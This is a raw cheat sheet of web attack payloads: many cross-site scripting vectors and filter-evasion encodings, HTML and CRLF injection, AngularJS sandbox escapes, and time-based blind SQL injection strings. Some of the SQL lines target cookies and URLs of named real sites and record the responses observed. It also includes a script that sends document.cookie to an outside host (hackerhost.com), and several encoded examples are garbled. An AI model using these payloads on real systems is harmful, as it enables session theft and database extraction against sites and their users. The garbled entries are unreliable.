" onEvent=@REQUESTID@ -- qualys

" onEvent=X148805780Y1Z -- qualys

>'>"><script>alert();</script>

>'>"><svg/onload=alert(document.domain)>

<script>prompt(1)</script>

<script>confirm(1)</script>

"><img src=x onerror='alert(xzz)'>

"><img src=x onerror='alert(document.domain)'>

' "/><img src= x onerror='alert(document.domain)'>

' "/><img src= x onerror=prompt(/xss/)>

"><img src=x onerror=prompt(/xss by me/)>

<img src='test' onmouseover='alert(2)'>

<img src="x" alt="'' ">

'"--></style></scRipt><scRipt>alert('XSSPOS ED')</scRipt>

/><script>window.alert('XSS Vulnerable');</script>

<script>window.alert('XSS Vulnerable');</script>

#<script>alert(document.domain)</script> dom

<script>alert(document.URL)</script>

<iframe src="http://www.cnn.com"></iframe>

"><img src=x onerror=alert(1)> -stored xss

<script>alert(1)</script>
json attibutes

if style sheet allowed this payload is used

"--></style></script><script>alert("XSS")</script>

-------

Fiter xss

/?#&;:="%<>@[\\]^`{|}

'';!--"<XSS>=&{()}

Fitered:

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
2%69%70%74%3e

<ScRipt>ALeRt("hi");</sCRipT>

vulnerable"%3B%20alert(%27Mondays%27)%3B%20"

json attibutes

"};alert(23);a={"a":

html tags

css expression : “x:expr/**/ession(alert(1))”

</script><script>alert("XSS")</script>
<body onload=prompt("justqdjing")>

>'>"><svg/onload=alert(document.domain)>

"/><svg onload=prompt(document.domain)>

"></script><svg/onload=alert("XSS")>-- url

https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/
1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E

' onerror='alert('XSS')' a='.jpg

'|alert('XSS')|'

%27|alert%28%27XSS%27%29|%27

%2527%257Calert%2528%2527XSS%2527%2529%257C%2527

';alert(/xss/)///

';alert(/xss/)///';alert(1)//";alert(2)///";alert(3)//--
></SCRIPT>">'><SCRIPT>alert(/xss/)</SCRIPT>=&{}");}alert(6);functions+xss(){//

------

javascript:alert(1);///// -outhn

javascript:alert(1);

javascript:alert(document.domain);

<ScRiPt%20>prompt(document.domain)</ScRiPt> -- naem

onmouseover=prompt(document.domain)-- if html encoded by form

http://www.aol.com/?mol=acm50overlaynl031213a8345 …<%2fscript><script>prompt(/Osama
Mahmood/)<%2fscript>22606c823c6&icid=acm50newslettersignup&shw=1
<SCRIPT>

Document.write('<img
src=\'http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>');

</SCRIPT>

------

<style><img src='</style><img src=x onerror=alert("document.cookie")//'>

'<script>alert('xss message')</script>

"><script>alert('xss message')</script>

>/"><script>alert('xss message')</script>

"><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>/><':

;<><script></script>/<script>alert('0')</script>

</script><script>prompt("test")</script>

"><script>alert(document.location)</script><"

--------------------------------------------------

<b><h1>Html Injection

#5 Inject fake <meta>

<a href="example.com">asdf</a>

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>

-----------------------------------------

1:- ';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
2:- "><img src=x onerror=prompt(1)>

3:- "><script>alert(“XSS”);</script>

4:- x'\"></script><img src=x onerror=alert(1)>

5:- "><svg onload="prompt(/xss/)"></svg>

" onmouseover="alert(1)

6:- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

7:- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

8:- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E

9:- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E

10:- "><font size=70 color=red>xss by ashish pathak

"()%26%251

-------------------

append <xss> ---- in any userinput box like recovery mail

--------------------

https://www.poodlescan.com/

--------------------

callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)//

javascript:alert(document.cookie);//

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>

< is encoded as: &lt;

> is encoded as: &gt;

CODE :

%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

&lt;script&gt;alert("XSS")&lt;/script&gt;
&lt;script&gt;alert("XSS")&lt;/script&gt;

&lt;script&gt;alert(%34XSS%34)&lt;/script&gt;

&lt;script&gt;alert('XSS')&lt;/script&gt;

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_onerror_and_javascript_aler
t_encode

http://webtechhut.blogspot.in/2014/12/cross-site-scripting-in-two-subdomain.html

<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>

<IMG%20SRC=axc%20onerror=alert(1)>

CRLF

http://www.yoursite.net/file?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200

OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E

"37d8600defb103276f30e279f5fdcb6d %0D%0ASet-Cookie:%20Attacker=Attacker;

MOre advance
XSS called CSS (Cross-Site Script), cross-site scripting attacks. Malicious attacker to insert malicious Web
page using html code

When users browse the page , the Web embedded inside html code will be executed , so as to achieve a
particular purpose malicious users.

XSS divided into two categories :

One is to attack from the inside , mainly refers to the use of the program 's own vulnerabilities , cross-
site constructed statements, such as : dvbbs of showerror.asp existing cross-site vulnerabilities.

The other is attacked from outside, mainly referring to construct their own XSS Cross Site pages or find
loopholes than there are non- target cross-site vulnerabilities page.

For example, when we want to infiltrate a site, we have constructed a cross-site vulnerabilities pages ,
and then construct cross-site statement , through a combination of other techniques , such as social
engineering , etc., to deceive the target server administrator to open

( 1 ) common XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT>

(2) IMG tag XSS use JavaScript commands

<SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT>

(3) IMG tag without a semicolon without quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tags are not case sensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML coding ( must have a semicolon )

<IMG SRC=javascript:alert("XSS")>

( 6 ) fix defects IMG tag

<IMG """> <SCRIPT> Alert ("XSS") </ SCRIPT> ">

(7) formCharCode pins ( calculator )

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Unicode UTF-8 encoding of ( calculator )

<IMG SRC=jav..??..S')>

Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator )

<IMG SRC=jav..??..S')>

( 10 ) hexadecimal encoding is no semicolon ( Calculator )

<IMG SRC=java..??..XSS')>

( 11 ) embedded tags , separated from the Javascript

<IMG SRC="jav ascript:alert('XSS');">

( 12 ) embedded coded labels will separate Javascript

<IMG SRC="jav ascript:alert('XSS');">

( 13 ) embedded newline

<IMG SRC = "jav ascript: alert ('XSS

');">

( 14 ) embedded carriage returns

<IMG SRC="jav ascript:alert('XSS');">

( 15 ) embedded multi -line injection of JavaScript, which is an extreme example XSS

<IMG SRC="javascript:alert('XSS')">

( 16 ) to overcome the limitations of characters ( with the required page )

<script> z = 'document.' </ script>

<script> z = z + 'write ("' </ script>

<script> z = z + '<script' </ script>

<script> z = z + 'src = ht' </ script>

<script> z = z + 'tp :/ / ww' </ script>

<script> z = z + 'w.zoyzo' </ script>

<script> z = z + '. cn / 1.' </ script>

<script> z = z + 'js> </ sc' </ script>

<script> z = z + 'ript> ")' </ script>

<script> eval_r (z) </ script>

( 17 ) null character

perl-e 'print "<IMG SRC=javascript:alert("XSS")>";'> out

( 18 ) 2 null characters , null characters in the country and basically had no effect because there is no
place to use

perl-e 'print "<SCRIPT> alert (" XSS ") </ SCRIPT>";'> out

(19) IMG tag and meta before Spaces

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"> </ SCRIPT>

(21) Non-alpha-non-digit XSS to 2

<BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"> </ SCRIPT>

( 23 ) double open parenthesis

<< SCRIPT> alert ("XSS") ;/ / << / SCRIPT>

( 24 ) No end script tags ( Firefox and other browsers only )

<SCRIPT SRC = http://3w.org/XSS/xss.js? <B>

( 25 ) No end script tags 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

( 26 ) half-open HTML / JavaScript XSS

<IMG SRC = "javascript: alert ('XSS')"

( 27 ) double open-angle brackets

<iframe src=http://3w.org/XSS.html>

( 28 ) No single quotes double quotes semicolons

<SCRIPT> A = / XSS /

alert (a.source) </ SCRIPT>

( 29 ) escape filtration JavaScript

Code:

"; alert ('XSS') ;/ /

( 30 ) End Title Label

</ TITLE> <SCRIPT> alert ("XSS"); </ SCRIPT>

(31) Input Image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

( 38 ) remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image ( list type )

<STYLE> Li {list-style-image: url ("javascript: alert ('XSS')");} </ STYLE> <UL> <LI> XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'> </ STYLE> <UL> <LI> XSS

design issue 360e0e url('http://www.google.com')

SQL
'%2 and if(substring(user(),1,1)='c',SLEEP(3),1)+' - true (sleeps 3 sec)

cfire_sid=42767ca19a891c1077f377f6e96120b2'%2 and if(substring(user(),2,1)='x',SLEEP(3),1)+'

----------

cfire_uid=1491167763614215' or substring(version(),1,1)=5-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(version(),1,1)=4-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(version(),1,1)=3-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(user(),1,1)='c'-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(user(),2,1)='f'-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(user(),1,1)='x'-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(user(),2,1)='x'-- ; - false (302 Found)

cfire_uid=1491167763614215' or (select(1))=1-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or (select(1))=2-- ; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d5--%20; - true (500 Internal Server

Error)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d4--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d3--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(user(),1,1)%3d'c'--%20; - true (500 Internal Server

Error)

cfire_uid=1491167763614215'%20or%20substring(user(),2,1)%3d'f'--%20; - true (500 Internal Server

Error)

cfire_uid=1491167763614215'%20or%20substring(user(),1,1)%3d'x'--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(user(),2,1)%3d'x'--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20(select(1))%3d1--%20; - true (500 Internal Server Error)

cfire_uid=1491167763614215'%20or%20(select(1))%3d2--%20; - false (302 Found)

---------------------------------------

Referer: https://parapa.mail.ru/forums/showthread.php?t=106825&page=74&p=3522012

Cookie: popup_promo_8=1; PHPSESSID=5qdrcd3qddl28cj3uckcb5jgqrd3;

parapa_sid=6a86c907dc5af9e51675dd9af28a26d2;
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)
))a)--%20;

parapa_sid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(2000
0000),1)))a)--%20 - true (sleeps 5 sec)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),2,1)='a',sleep(5),1))
)a)--%20 - true (sleeps 5 sec)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),3,1)='x',sleep(5),1))
)a)--%20 - false (quick response)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),4,1)='z',sleep(5),1))
)a)--%20 - false (quick response)

------------------------------------------

Blind test

PoC (wait a while):

http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&total_entries=2&sort_
by=id&order=asc&client='+or+benchmark(10000000,md5(1))='

PoC (no wait):

http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&total_entries=2&sort_
by=id&order=asc&client='+or+benchmark(0,md5(1))='
----------------------------------------
angular JS

<div ng-app>

{{

'a'.constructor.fromCharCode=[].join;

'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

}}

</div>

<div ng-app>

{{
 'a'.constructor.prototype.charAt=[].join;

$eval('x=alert(1)')+''

}}

</div>

<script>

onload=function(){

document.write(String.fromCharCode(97));

</script>

List of Sandbox bypasses

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Cure53)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,
0,'alert(1)')()}}

1.2.2 - 1.2.5

Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert
(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18

Jan Horn (Cure53)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23

Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toStrin
g.constructor);}}

1.2.24 - 1.2.29

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002e
x=1)')+eval(y)+\"'");}}

1.3.0

Gábor Molnár (Google)

{{!ready && (ready = true) && (

!call

? $$watchers[0].get(toString.constructor.prototype)

: (a = apply) &&

(apply = constructor) &&

(valueOf = call) &&

(''+''.toString(

'F = Function.prototype;' +

'F.apply = F.a;' +

'delete F.a;' +

'delete F.valueOf;' +

'alert(1);'

))

);}}

1.3.1 - 1.3.2
Gareth Heyes (PortSwigger)

{{

{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=''.valueOf;

$eval('x=alert(1)//');

}}

1.3.3 - 1.3.18

Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=[].join;

$eval('x=alert(1)//'); }}

1.3.19

Gareth Heyes (PortSwigger)

{{

'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;

$eval('x=alert(1)//');

}}

1.3.20

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
tIME PAYLOAD

%22%20onmouseover%3dalert%281%29%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bhe
ight%3a100%25%3btop%3a0%3bleft%3a0%3b%20d7451

Basic XSS Payloads:

<script>alert(“Xss-By-Muhaddi”)</script>

“><script>alert(“Xss-By-Muhaddi”)</script>

“><script>alert(/Xss-By-Muhaddi/)</script>

When inside Script tag:

</script><script>alert(“Xss-By-Muhaddi”)</script>

“);alert(“Xss-By-Muhaddi”);//

Bypassing Tag Restriction With Toggle Case:

“><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>

“><ScRiPt>alert(“Xss-By-Muhaddi”)</sCrIpT>

XSS Using Image & HTML tags:

Works Only On Chrome

“><detials ontoggle=confirm(0)>

“><IMG SRC=x onerror=javascript:alert(&quot;Xss-By-Muhaddi&quot;)>

“><img onmouseover=alert(“Xss-By-Muhaddi”)>

“><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>

“><a href=javascript:alert(/Xss-By-Muhaddi/)Click Me</a>

“><h1 onmouseover=alert(“test”)>Hover Me</h1>

“><svg/onload=prompt(“Xss-By-Muhaddi”)>

“><body/onload=alert(“Xss-By-Muhaddi”)>

Style Context:

Only Works On Older Versions of Internet Explorer, IE7, IE8

If Input Is Inside <Style> Tag:

body{xss:expression(alert(“Xss-By-Muhaddi”))}

If Input Is In Style=” ” Attribute:

xss:expression(alert(/Xss-By-Muhaddi/)

Bypass Script Tag Filtering:

<<SCRIPT>alert(“Xss-By-Muhaddi”);//<</SCRIPT>

%253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e

“><s”%2b”cript>alert(/Xss-By-Muhaddi/)</script>

foo<script>alert(/Xss-By-Muhaddi/)</script>

<scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>

Advance Payloads:

Hex Encoding
“><IMG SRC=x
onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x
72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

“><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe

“><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>

“><a id=”a”href=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=”xss-test”>Click

me</a>#a <

<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe

Some Alternative Useful Keywords:

Alert = a\u006cer\u0074

Prompt = p\u0072om\u0070\u0074

Confirm = co\u006efir\u006d

Javascript = j&#x00041vascr&#x00069pt

: = &colon;

( = &lpar;

) = &rpar;

Using alert(/Xss/) in a link = alert%28 /Xss/%29 example: <a href=”javascript:alert%28 /Xss/%29?>Click

Me

Base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+